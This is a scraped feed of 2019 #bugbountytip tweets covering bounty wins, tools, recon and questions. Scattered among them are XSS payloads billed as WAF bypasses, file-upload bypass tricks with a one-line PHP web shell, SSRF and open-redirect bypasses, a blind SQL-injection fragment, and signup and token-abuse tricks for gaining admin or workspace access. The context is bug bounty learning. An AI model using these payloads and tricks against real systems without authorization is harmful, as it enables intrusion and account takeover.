0 Hey, @LinkedIn , I found a bug in your system. Please respond if you want to fix it. #bugbounty #testing #bugbountytip #LinkedIn
Simon
@7s26simon


2019-09-13 15:48:26
0 Submitted my first #bugbounty report !!! Hope it hasn't been reported already #ethicalhacker #hack #hacking #pentest #pentester #bugbountytip
Mohan Sri Ramakrishna
@S1r1u5_


2019-09-13 14:10:54
0 Yay, I was awarded a $500 bounty on @Hacker0x01! https://t.co/ac1KEZZZWM #TogetherWeHitHarder. #bugbountytip Actually, I am afraid to test the program cuz I saw some good hackers in the thanks page, But I started and I found a reflected XSS on the main page itself.๐Ÿ˜‡
Mourad
@SecuAudit


2019-09-13 11:07:24
0 Any advice how to get into "Apache Axis version: 1.2.1" where remote admin is disabled ? #bugbountytip #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-09-13 06:23:51
0 HTML to PDF converter bug leads to RCE in Facebook Server -- #BugBounty #BugBountyTip #Writeup https://t.co/UgmPhls8Mb
saranraj
@KceSaranraj


2019-09-13 01:58:28
0 I have the following code <li title="?"> test </li> I need to inject vector to break down the HTML Attributes and execute the alert using an event. is there a way to achieve this without using single/double quotes? <>&*#%\'" - Not Allowed @h1_kenan @le4rner #bugbountytip #xss
Mr.CryptoCZ
@cechv2


2019-09-12 06:56:18
0 #Electroneum #ETN $ETN is looking for Bug bounty hounters, IT Gurus, Hackers, if you want to earn money and help @electroneum be more secure go and check our Hackerone program #bugbountytip #Hacker #hackerone #fintech #app https://t.co/qUZ0h5mqqK
Yadhavi
@PrincessYadhavi


2019-09-12 05:18:36
0 Found a subdomain which is pointing to cloudfront using cname. And when i open the page it shows "NoSuchBucket" "The specified bucket does not exist" error. is subdomain takeover possible here? If yes, how? #bugbounty #bugbountytip #bugbountyhelp #s3
แด‚
@pouyana1


2019-09-12 04:19:02
1 *content-length filtering: use small size shells like: <?='$_GET[x]'?> #bugbounty #bugbountytip #hacking #infosec #hack
แด‚
@pouyana1


2019-09-12 04:19:01
0 *client side filtering: upload a valid file, intercept the request and change it to the shell extention (php,asp,jsp,..) *content-type filtering: change the content-type to valid content-type like: image/jpeg #bugbounty #bugbountytip #hacking #infosec #hack
แด‚
@pouyana1


2019-09-12 04:19:01
1 file upload restriction bypass: * name filtering: 1) blackboxing: try to use file extentions like: php[3-n],phtml, pht. 2) whitelising: use null-byte:shell.php%00.gif use double extention format : shell.php.jpg or shell.jpg.php #bugbounty #bugbountytip #hacking #infosec #hack
Henry Chen
@chybeta


2019-09-12 03:06:03
1 bounty calculation formula: crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty #bugbounty #bugbountytips #bugbountytip https://t.co/QCODeeZhC3
Murdockz
@Murdockz_CEH


2019-09-12 00:25:03
0 Sometimes you need to take a long step back to learn new technologies in order to enhance your Bug Bounty skills. Learn the technology that companies use in order to break and exploit them even more. #bugbounty #bugbountytip #bugbountytips https://t.co/lge8ogvAPr
Arif Khan
@payloadartist


2019-09-11 07:06:15
1 Awesome giveaway! ๐Ÿ”ฅ #infosec #bugbounty #bugbountytip https://t.co/0qJjiSx3zl
Sukhmeet Singh
@MadGuyyy


2019-09-11 01:30:19
0 > Website had admin panel with "Login with Google" > Only allowed Google login with company's email > Created an email account [email protected] > Created Google account with that email > Logged into admin panel with Google. ๐Ÿ’ฐ$1500 #BugBountyTip #InfoSec #BugBounty
C1h2e1
@C1h2e11


2019-09-11 00:48:34
0 #bugbountytip #bugbountytips Using https://t.co/5gM8SE3B4J for subdomain monitoring, last night I found a .DS_Store leaking on the latest subdomain on https://t.co/5gM8SE3B4J
Guilherme Keerok
@k33r0k


2019-09-10 17:08:23
2 Cloudflare WAF bypass: open("https://host/?xss=%3Ca/href=javascript:1%26%26%26%23x6e;ame%3Eclick me%3C/a%3E","<svg onload=alert(document.domain)>"); #bugbountytip #bugbounty #xss #bugbountytips
Jenish
@_jensec


2019-09-10 16:39:37
2 Yay, I was awarded a $2,000 bounty on @Hacker0x01! For accessing company dashboard via creating account with Email โ€œ[email protected]โ€ on main web app and login to dashboard with SSO. #bugbountytip
wywwzjj
@wywwzjj


2019-09-10 16:29:38
0 @artofwebhacking @chybeta https://t.co/O8D1Pp6IcP Here is a website that archive bug bounty tips. ๐Ÿ‘‰https://t.co/Kvxfo3jCh8 Check it out, it has other useful resources too. ๐Ÿ˜€ #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
o k t a v a n d i
@0ktavandi


2019-09-10 16:08:24
1 anyone have hackerone report with SSRF issue 307 redirect bypass?? #bugbountytip #bugbountytips
Rishabh
@____cypher____


2019-09-10 09:40:44
0 Perfect oneliner for subdomain enumeration curl -s 'https://t.co/A3Qe45ZOra%.'<TARGET>'&output=json' | jq '.[] | .name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u #bugbounty #bugbountytip #bugbountytips #infosec
brsn
@brsn76945860


2019-09-10 04:08:46
0 @achillean @ItsReallyNick @x04steve @shodanhq I've tweeted this a few hours ago, but this works for me: ---------- import mmh3 import requests response = requests.get('https://yourwebsite/favicon.ico') favicon = response.content.encode('base64') hash = mmh3.hash(favicon) print hash ---------- #Shodan #bugbountytip
Securisec ๐Ÿš€
@securisec


2019-09-09 14:25:30
0 "RT RT osamaavvan: My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/pUyJV4QdcW"
Iheb
@ihebhamad514


2019-09-09 12:46:53
0 I found a #bugbounty program where it implements a captcha protection field after certain requests with burp intruder, the only way to bypass it is to delete the Cookie header. As a result, I got 2 valid users accounts. #bugbountytip
Aussan ๐Ÿ‡จ๐Ÿ‡ฆ
@aussan_m


2019-09-09 12:33:12
0 A lot of time people forget to look at the response or intercept the response in burp. Always examine the response in details especially when logging in. I was able to go from regular user to Admin by manipulating the response #bugbountytips #bugbountytip
Japz Divino
@japzdivino


2019-09-09 02:42:25
0 Reading hacktivity report will lead you to bounties by just bypassing the fix for the disclosed report.๐Ÿ‘Œ #noobtip #bugbountytip https://t.co/ppnliULt5T
Hx01
@Hxzeroone


2019-09-08 05:35:30
1 #bugbountytip if the password reset link is shortened in email try checking for common hashes/encodings you may end up with gold mine, in the below scenario the url was shortened and the url id was sequential and encoded in base64 -->Scraping all generated password resets links. https://t.co/n11msD9iPP
x30r
@x30r_


2019-09-07 21:55:13
1 Into cyber security?? I don't know who votes what so lets have a poll! What suites you the most! #cybersecurity #bugbountytip #bugbounty #infosecurity #infoeec
Hussein Daher
@HusseiN98D


2019-09-07 19:40:04
7 Analysis of an RCE I found past week. RT and Like if you want more! If you got a bug bounty program, I'm open to any invite :) #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/VX6QATnRJH
An0nym0us
@MeetAn0nym0us


2019-09-07 17:54:13
1 #bugbountytip While testing a Laravel site try injecting different kinds of payloads or change Request methods to GET>POST or POST>GET. this will result in Laravel exception handler error Disclosing AWS, Database, and SMTP Credentials. https://t.co/jTnU3rf28y
Zeinab Raadsato
@ZRaadsato


2019-09-07 17:21:09
0 All courses are available: Burp Suite, Ethical Hacking, Networking, Secure Coding Free for limited time. #bugbountytip #BugBounty https://t.co/fZCGs25uF0
Jenish
@_jensec


2019-09-07 09:34:14
0 Yay, I was awarded a $1,050 bounty on @Hacker0x01 for bypassing 2FA via old API versionโ€™s login page! https://t.co/YGr8yp0IKy #TogetherWeHitHarder #bugbountytip
Osama Avvan
@osamaavvan


2019-09-07 08:22:00
2 My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/Ewt9p3qPSe
Muzammil Kayani ๐Ÿ‡ต๐Ÿ‡ฐ
@muzammilabbas2


2019-09-06 15:26:35
0 #bugbountytip:Access the site without loging into account you will get some hidden endpoints which are overlooked by others.
Tinu rockk
@TinuRock007


2019-09-06 11:14:47
0 https://t.co/kCnDw5TEZu Open redirect to xss (2019) @BugBountyPOC #bugbountytips #BugBountyPOC #BugBounty #security #bugbountytip #bugbountytips #xss https://t.co/KTAOhiR0I7
C1h2e1
@C1h2e11


2019-09-06 10:05:40
1 #bugbounty #Bugbountytip Yesterday's problem was solved, forgetting to modify the Conetent-length but result is duplicated . So sad
Shamem Ahmad
@blkryd


2019-09-06 09:13:48
0 Finding webshells in a linux server. find . -name "*.php" | xargs grep -E 'webshell|' #Bugbountytip #hacktolearn
Shamem Ahmad
@blkryd


2019-09-06 08:50:54
1 A plus sign (+) A simple URL encoded space (%20) A null byte (%00) A newline (%0a) A tab (%09) A carriage return (%0d) #Bugbountytip
OSRC
@OsrcSecurity


2019-09-06 07:59:10
0 We are updating the official website now, but always welcome all the hackers chasing the bug bounty of OSRC, any issue or question about the programs, just leave your messages or to our emailbox [email protected] #Hackers #Bugbountytip
Leonel Emiliano
@leoalgare


2019-09-06 05:02:35
0 Hey guys, is there any way to perform a bypass of CSRF if i need to set an specific XSRF-TOKEN in order to exploit the issue ? I wasn't able to use XHR because of CORS policy. Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * #bugbountytips #bugbountytip
Shubham Sharma
@Shubham_pen


2019-09-06 03:13:23
7 Today you will learn WordPress penetration testing using WPScan and Metasploit. @rajchandel @metasploit @ubuntu @kalilinux @wordpressdotcom @github #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningFriday #CyberAttack #oscp #blackhat https://t.co/KT2wD17IVG
ak1t4 ๐Ÿ‡ฆ๐Ÿ‡ท
@akita_zen


2019-09-06 02:02:10
9 #Bugbountytip: forget the subdomains for recon! go directly for the ASN & hit the network-range organization: A new world arises without wafโ€™s, a lot of messy SSL certs, unprotected hosts & private hidden scopes! #bugbounty #infosec #thinkOutsideTheBox
C1h2e1
@C1h2e11


2019-09-05 17:05:24
1 #bugbounty #BugBountyTip I found an HTTP Request Smuggling and looked for the endpoint that echoed the request. In this endpoint, I tried to enter the long data successfully, but I ended up testing only a few characters of the request I don't know why this is๐Ÿ˜‚
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-09-05 14:17:38
1 -โ€œAn XSS on Facebook via PNGs & Wonky Content Typesโ€: https://t.co/K7uiWoQtZ8 -shopifyapps XSS on sales channels via currency formatting: https://t.co/wu6SZ1DcxE -UNITED AIRLINES XSS: https://t.co/kRbaMJTXlN -GOOGLE TAG MANAGER STORED XSS: https://t.co/PBAj81OEE1 #BugBountyTip
Proxy
@LinuxKodachi


2019-09-05 13:49:35
0 Here is a website that archive bug bounty tips. ๐Ÿ‘‰https://t.co/hG46WtG0dd Check it out, it has other useful resources too. ๐Ÿ˜€ #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
emir c a
@emirca_


2019-09-05 10:13:07
0 Got the 500 error with single quote but canโ€™t find the SQLi parameter for it... But 500 error can lead to SQLi right? #BugBounty #bugbountytip
โœŽ /๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-09-05 05:59:42
0 CloudFlare {WAF} "R-XSS" Bypass; ๐Ÿ›ก ~ <isindex action="javas&tab;cript:alert(1)" type=image> ~ #BugBounty #BugBountyTip #WAF #infosec
David Schรผtz
@xdavidhu


2019-09-04 17:08:11
2 #bugbountytip - If your target requires phone number verification and you need more accounts, you can just buy a really cheap prepaid SIM card, and without topping it up, you can recieve the verification codes in SMS! โšก (even better if you have a dual-sim phone) https://t.co/oUDJKIik3X
Mourad
@SecuAudit


2019-09-04 16:25:54
0 How do you deal with your hosting server provider for large Port Scanning complaints ? #bugbounty #bugbountytip #pentesting #hackerone https://t.co/pn9Zzmxuaa
sudoka
@sudo_sudoka


2019-09-04 16:10:23
0 Does anyone have experience with @InternetNZ bugbounty program? #bugbounty #bugbountytip
intigriti
@intigriti


2019-09-04 12:27:00
6 Did you know you can extract the AWS S3 bucket name from an object URL by appending these parameters? ๐Ÿ•ต๏ธThanks for the #BugBountyTip, @neeraj_sonaniya! #HackWithIntigriti https://t.co/cfVpRpOw1s
Hackers Academy
@Hackers_Academy


2019-09-04 10:40:17
0 98 Days Left! Introducing the 2nd training... @banyrock will take you on a 4 days journey of fully practical web hacking & bug hunting training. Be ready to learn some advanced techniques! #bugbountytip #Pentesting #infosec https://t.co/ixzLERf8Io https://t.co/9B4tg5DSvF
Rรฉmy Marot
@R_Marot


2019-09-03 21:13:30
0 Quick #bugbountytip : if you are testing a symfony application, do not forget to check both app_dev.php and app_test.php controllers for debug information and sometimes sensitive information disclosure
Julien Ahrens
@MrTuxracer


2019-09-03 18:36:57
0 Plaintext password disclosure leading to admin access on a development environment. That just made my day. Remember: Always dig into JS files. They're a gold mine of stuff! #BugBounty #BugBountyTip
Dhamu
@Dhamuharker


2019-09-03 15:02:54
1 #bugbountytips The AWS Cloud Post Exploitation framework! POC https://t.co/nmhvNDdIRU #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder
abdoul gadiri balde
@moodiAbdoul


2019-09-03 12:17:38
2 #bugbountytip you can also use https://t.co/SI3CMaQq42 during recon , just search your target website or app to know how it work in short of time #infosec #bugbounty
Un4gi
@Un4gi1


2019-09-03 08:50:20
0 #bugbountytip If you donโ€™t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced! ๐Ÿ˜ƒ
Bob Nicolson
@NicolsonBray


2019-09-03 08:01:00
0 Google throws bug bounty bucks at mega-popular third-party apps https://t.co/ZSu5DHaLjf #BugBounty #bugbountytip #google #Apps #cybersec #infosec #Hackers https://t.co/UzhkCYOmww
Meelo
@CaptMeelo


2019-09-02 12:21:41
1 Just published another post that might be useful during #bugbounty or #recon sessions. #bugbountytip https://t.co/NTTaI2KqHE
โœŽ /๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-09-02 06:43:33
6 ModSecurity { XSS } Detection Bypass; ๐Ÿ” { 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'> { 2 }; "></tag><svg onload=alert(spyerror)> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-09-01 21:30:41
0 There is no csrf token when changing email.I'm creating csrf poc, and when I try to open poc.html with my other account, I get a "session expired" warning. what is the problem? How can i bypass it? #hackerone #bugcrowd #infosec #BugBounty #bugbountytip #csrf #intigriti
%00Termi
@Elhan65805947


2019-09-01 12:36:25
0 https://t.co/xNc07m02x7 >> campanyname.tld Paste >> https://t.co/NLo3oX2Loz Sometimes you may find upcoming project details, link to invite private meetings, other stuff. Keep on checking regularly. #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-09-01 12:30:19
1 is is not difficult to bypass #XSS filters. remamber that firewall is a stupid device,just edit a s simple part of the payload . you can use encoding,tag modifiers. and a lot other ways like adding some unfamiliar characters or symbols to the payload. #bugbountytip
ak1t4 ๐Ÿ‡ฆ๐Ÿ‡ท
@akita_zen


2019-09-01 01:43:09
7 #Bugbountytip: take your time to learn bash, curl & python ๐Ÿ basics scripting. With only a few lines of those you can break anything! Automate your scripts & get the bests PoCโ€™s #bugbounty #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-31 17:22:20
0 how can i redirect xhr login page? ฤฐf i capture request with burp , web page redirecting other web page. But i cant do it wih url? Any idea? #hackerone #bugcrowd #bugbountytip #infosec #redirect #vulnerability
Security Chops
@securitychops


2019-08-31 15:05:31
0 /dev/random - One Liner For Installing Burp Certificate Into Android Nougat and Later #burp #android #BugBounty #bugbountytip https://t.co/BtVxMMy6Jb
sudoka
@sudo_sudoka


2019-08-31 12:17:54
1 CSP can support you to make a #clickjacking possible even when X-Frame-Options: DENY. #bugbounty #bugbountytip https://t.co/AQf5mQk84W
Proxy
@LinuxKodachi


2019-08-31 06:57:10
0 Here is a google dork to find discord servers. ๐Ÿ‘‰ https://t.co/bmVpQAaOgy "keyword" #bugbountytip #OpenSource #osint #Discord
Elhan
@Elhan65805947


2019-08-30 20:09:48
0 A single little dork can give admin access. Site:https://t.co/AUzqSGF92I companyname.tld Bookmark else keep intresting tabs hanging. >> win! #BugBounty #bugbountytip
Mourad
@SecuAudit


2019-08-30 17:30:33
0 I just lost 3000$USD in 2 days trading Forex , definitively Bug Bounty is more profitable and less risky than trading๐Ÿ˜ฐ #BugBounty #bugbountytip
Jenish Sojitra
@_jensec


2019-08-30 16:58:57
0 Yay, I was awarded a $1,200 bounty on @Hacker0x01 for tricky privilege escalation ! โ€œ If API endpoint /api/path/ep throwing 401 try to go with /api/path/ep.json โ€œ and it will fetch out json data without checking access control ! #bugbountytip
sagar yadav
@sagaryadav8742


2019-08-30 16:32:42
0 Hotstar swag ๐Ÿ˜Š Happy to #secure #hotstar #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #bounty #sagaryadav8742 https://t.co/iAgSxeRFre
Cyberthereaper
@Cyberthereaper3


2019-08-30 16:31:00
0 Is have dork for out of band all injection method? #hackerone #bugcrowd #infosec #bugbountytip
intigriti
@intigriti


2019-08-30 14:19:13
2 Thanks for the #BugBountyTip, @securinti! #HackWithIntigriti (P.S.: You are now banned from our live webinars) ๐Ÿ‘€๐Ÿšซ https://t.co/z8Cz3rAUgS
sagar yadav
@sagaryadav8742


2019-08-30 13:37:17
0 #redstorm swag #reward and #hof Happy to #secure #redstorm ๐Ÿ˜Š #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter https://t.co/azpBgqAn21
3P1C
@_3P1C


2019-08-30 13:27:03
0 Bypass for SSRF filter Find a subdomain of your target (whitelisted) that resolves to an internal IP Like this internal[.]target[.]com --> 127.0.0.1 #bugbountytips #bugbountytip @intigriti @Bugcrowd @Hacker0x01
Fisher
@Regala_


2019-08-30 09:42:22
2 Yes!! Burp Scope Monitor just reached its 100thโญ๏ธ!! ๐Ÿฅณ๐Ÿฅณ If you haven't used it yet, have a look at https://t.co/2zzgrNvj3G. Currently I'm especially looking for bugs/improvements suggestions so I can work on them later. #bugbounty #bugbountytip #infosec #pentest
Fady Othman
@Fady_Othman


2019-08-30 05:37:29
1 Do you think recording video tutorials using a 21:9 format (Wide Screen) is a good idea? #bugbounty #bugbountytips #bugbountytip
The_unstable
@chaskar_shubham


2019-08-29 13:03:23
0 I rewrote Recce from scratch! It is now more faster than previous version. It can now detect server. you can write output in csv file. https://t.co/CGFQHNaA64 check out! #bugbountytips #bugbountytip #bugbounty #InformationSecurity #infosec #infosecurity #hackerone #bugcrowd
Jagannath
@SecurityBoy0x01


2019-08-29 09:56:59
0 [Protip] Passwords using leetspeak are much safer than normal passwords against bruteforce-attacks with word--lists. E.g '53CURI7Y' is much secure than 'Security', when combined with password managers. #bugbountytip #Password #hacking
Cyberthereaper
@Cyberthereaper3


2019-08-28 22:59:14
0 The biggest obstacles that will prevent you in bug bounty programs. Ruby web page Json content-type Akamaighost Cloudfront Cloudflare #BugBounty #hackerone #bugcrowd #intigriti #infosec #bugbountytip
Julien Ahrens
@MrTuxracer


2019-08-28 18:23:55
1 I recently got a maximum bounty for: Reflected XSS -> Grabbed user's identity token (no auth) -> Found auth logic error that converted the token w/o the user's pwd into an auth token -> ATO & 2FA Bypass. Always maximize your impact! #togetherwehitharder #bugbountytip #BugBounty
Yadhavi
@PrincessYadhavi


2019-08-28 16:42:39
0 How much rate you will use to get best results from masscan? (1024 hosts, 5$ digitalocean vps) #bugbounty #bugbountyhelp #bugbountytip #bugbountytips #masscan
Random Robbie
@Random_Robbie


2019-08-28 10:32:27
3 #bugbountytip BUGROBBIE for discount on @binaryedgeio
Cache Bounty @127.0.0.1
@Cache_Bounty


2019-08-28 09:06:40
1 Old but very useful: https://t.co/j1GHbfHNsc #security #bugbountytip #bugbountytips
Michael Eder
@michael_eder_


2019-08-28 08:33:10
1 Authenticated dirbusting 1) Log in w/ Firefox>DevTools>Network>reload page 2) Right click request, "copy curl" 3) rustbuster <your regular rustbuster options> <all -H parameters of the curl command> 4) Profit #infosec #bugbountytip #pentest
kaustubh padwad
@s3curityb3ast


2019-08-28 08:13:39
1 Ever Happen'd this @Hacker0x01 with known guys.. @sagarparmar121 @niksthehacker @stokfredrik @fransrosen @emgeekboy @Parth_Malhotra #bugbountytip #bugbounty @gwendallecoguic #hackerone #bugcrowd @SynackRedTeam is exception for this sharp 24Hrs payout.. ;) Just for Fun #bontyfun https://t.co/wyuV36SLWt
Nihad
@nihad_rekany


2019-08-28 08:09:48
0 Feeling love ๐Ÿฅฐ๐Ÿฅฐ @fbsecurity #bugbountytip #bug https://t.co/Pc9V8CSJuu
Nihad
@nihad_rekany


2019-08-28 08:08:24
0 Thank you @fbsecurity ๐Ÿฅฐ๐Ÿฅฐ๐Ÿฅฐ #bugbountytip https://t.co/jnggbyDNx8
Neeraj Edwards
@neeraj_sonaniya


2019-08-28 05:29:04
2 Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append following string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name. #BugBounty #security #bugbountytip #bugbountytips https://t.co/JWqGuZLHW4
Ahmed Lekssays
@Lekssays


2019-08-27 22:51:16
0 I made a tool to Extract Open Kibana Instances on Internet and Map them to their Corresponding Organizations using SSL certificates for Bug Bounty Programs. You can check it out: https://t.co/IQQIKdaAaC Happy hunting ;) #bugbounty #bugbountytip
Radek
@radekk


2019-08-27 19:45:52
1 Read how to use Burp Suite with multiple Firefox profiles - https://t.co/xqRPeT8NfC #bugbountytip #bugbounty
Aussan ๐Ÿ‡จ๐Ÿ‡ฆ
@aussan_m


2019-08-27 18:15:36
1 #bugbounty #bugbountytip When you get a bounty try to remember that there are people in need out there...try to give to charities, ... helping companies become secure is great, but helping others is even better.... remember what goes around comes around....
kaustubh padwad
@s3curityb3ast


2019-08-27 16:31:02
0 If you could ever build such complex query and if it returned 404 in "boolean based blind sql injection" AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x21) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70686f746f73. what will be your reaction... #bugbountytip #ctf
โœŽ /๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-27 00:31:48
3 CloudFlare {"HTML TO XSS"}; ~byPass Detected. ๐Ÿ“ก [" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "] #BugBounty #BugBountyTip #WAF #infosec
โœŽ /๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-26 23:48:19
0 CloudFlare {"XSS"}; ~byPass Detected. ๐Ÿ“ก <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-26 21:52:05
0 I think one of the pages you hate to open the xss alert box is that it uses the ruby โ€‹โ€‹software language. #bugbounty #bugbountytip #hackerone #bugcrowd #infosec #redteam #xss #hacking
Murdockz
@Murdockz_CEH


2019-08-26 17:36:42
0 Created my first "Real" python script that decodes any base64 string...I think lol. Don't judge me it's my first time learning python lol. Check it out. #bugbountytip #bugbountytips #bugbounty https://t.co/rSnsf6BoBb
kaustubh padwad
@s3curityb3ast


2019-08-26 17:19:32
0 This is how I learn SQL Injection Now a days... #rofl #ctf #SQL #injection #bugbountytip #wireshark #hackerone #AppSec but I can imagine how tough is this to exploit, since sqlmap is taking too much time now its 2+ Hours with --dump-all... :) https://t.co/t1G0qtaNQh
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-08-26 16:50:20
0 Regexp trying detect Open redirect in response for burp #bugbountytips #bugbountytip https://t.co/LTbegfJf77
Murdockz
@Murdockz_CEH


2019-08-26 09:48:23
1 My first bug crowd P1. API Keys, Firebase Tokens, Account username and password. Recon wins. #BugBounty #bugbountytip #bugbountytip https://t.co/K6C0mnajQH
Hussein Daher
@HusseiN98D


2019-08-25 14:31:51
10 As per the vote results, here you go! A cool XXE resulting from a SSRF found on local company website during a pentest. DMs are open, retweet and like if you love this style of PoC! ๐Ÿ˜Ž #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
gautam bhatia
@gautambhatia57


2019-08-25 11:14:23
0 Thanks a lot @defcon @DCG91135 @Bugcrowd @lab401 @infosecgirls @hackthebox_eu @PortSwigger for amazing workshop at DIT University #infosec #security #reversing #bugbountytip #rfid https://t.co/wqtmwLM4y9
Arif Khan
@payloadartist


2019-08-24 14:17:36
2 Another awesome research by a god of websec @filedescriptor: The Cookie monster in your browsers https://t.co/x051kiyWgJ #BugBounty #BugBountyTip
Hussein Daher
@HusseiN98D


2019-08-24 13:52:55
1 My next #bugbountytip PoC (check my Twitter for a preview of the old ones) should talk about: #bugbounty
Yogendra Jaiswal
@vulnh0lic


2019-08-24 13:28:31
17 Just Published article of [iOS Application Security] Jailbreak 12.4 and SSL pinning bypass | How to set up your iOS Testing Lab https://t.co/kVAs20V8dC #infosec #bugbountytip #sslbypass #jailbreak #iOS124 #unc0ver Thanks, @prateek_0490 and @Yassineaboukir @jpjaypatel34
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-24 11:25:33
1 Time US : 10:00 Time ID : 21:00 Bug Bounty Live! basic #recon , VulnerabilityAnalysis #shodan Live at : https://t.co/QdsrDoweOQ Follow Live streams and share... #BugBounty #bugbountytips #bugbountytip #hackerone #bugcrowd
Raihan Biswas ๐Ÿ‡จ๐Ÿ‡ฎ
@zapstiko


2019-08-24 05:01:29
3 Sucuri {` XSS ยด}; payloads `appeared fresh, confirmed.ยด โ†ญ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Vitthal Shinde
@0_1VitthalS


2019-08-24 04:11:48
1 If you found a hardcoded slack token, you can use it to get invitation to slack group. https://t.co/OMxs8QFVjQ<slack_token>&channel=CL0KQ4SK1&user=<email>&pretty=1 #BugBountyTip
โœŽ /๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-23 06:41:14
1 Sucuri {` XSS ยด}; payloads `appeared fresh, confirmed.ยด โ†ญ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Uranium238
@uraniumhacker


2019-08-22 18:02:56
1 Have your tools exporting stuff as JSON? use Panda to export it as a .db file. You can then use client side js to parse the db and query through it. #bugbountytip
contra_security
@security_contra


2019-08-22 17:46:16
0 Analysis of Ruby rest-client 1.6.13 backdoor https://t.co/KGSXYpw68B @snyksec #owasp #backdoor #ruby #appsec #bugbountytip
m0z
@LooseSecurity


2019-08-22 16:47:55
6 file.php?url=/admin/ Redirects to: https://t.co/xsJrSUcfgM Put URL [email protected] Now it is [email protected] which redirects to https://t.co/ptXaIXLfKk! #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity
Prateek Tiwari
@prateek_0490


2019-08-22 15:47:03
4 Really shocking to see how companies leave their log instances exposed to public. I'm referring to #Kibana, since last few weeks have found a lot of them, reported to companies who have BBP's. Dork - inurl:app/kibana Shodan - title:"kibana" port:"443" #bugbountytip #bugbounty
sudoka
@sudo_sudoka


2019-08-22 10:57:15
0 I've seen some websites block exactly the string "alert(something)" #xss #bypass #bugbountytip https://t.co/MKOSMHdKcA
Dhamu
@Dhamuharker


2019-08-22 09:11:57
2 #bugbountytips #BugBounty Finally Got it Root Access. Thanks for @orange_8361 @ProjectZeroIN the exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) https://t.co/k1Qk45QnCq #bugbountytip #ItTakesACrowd #TogetherWeHitHarder https://t.co/lwJi2ss068
Anton Korzhynskyi
@page_1337


2019-08-21 21:42:14
0 My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip https://t.co/UxkKOfkioC
โœŽ /๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-21 19:54:51
1 ModSecurity {" XSS "} ~Bypass braindeath; โ“พ ~1; " %3Cspyerror%20script%20goes%20here%3E=%0AByPass " ~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E" #BugBounty #BugBountyTip #WAF #infosec
CaptainFreak
@0xCaptainFreak


2019-08-21 12:09:46
0 On Rails target, many people don't try XSS tests by knowing that Rails by default doesn't reflect without escape/encode. But "security concious" devs mistake the "html_safe" method of rails for escaping while it does the exact reverse thing. Hence, XSS lives on. #bugbountytip
Abugzlife
@abugzlife1


2019-08-21 01:39:35
5 Have you ever thought to yourself: โ€œYou know what, Iโ€™m really curious what the methodology for finding bugs that an average bug hunter who focuses on depth rather breath looks like!โ€ Well, now is your chance to see! https://t.co/ih8hwmaIP6 #bugbountytip #bugbounty
plenum ๐Ÿ‡น๐Ÿ‡ณ
@plenumlab


2019-08-20 23:21:47
1 To those who struggle to get into bb I barely knew what http requests look like, 14 duplicates and 4 N/A before my first valid report, don't quit, every minute, every inspected http request is experience #bugbountytips #bugbountytip
Ammar Amer
@cry__pto


2019-08-20 23:15:45
1 i think you should visite my repository ,you may find something useful about hacking & pentesting & cybersecurity & redteam & malware. almost 2000 link & almost 1000 article as pdf files. enjoy and #happy_hacking https://t.co/q2layzVpKz #sharingiscaring #bugbountytip #OSINT https://t.co/DWQFvHpWuN
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-20 19:03:48
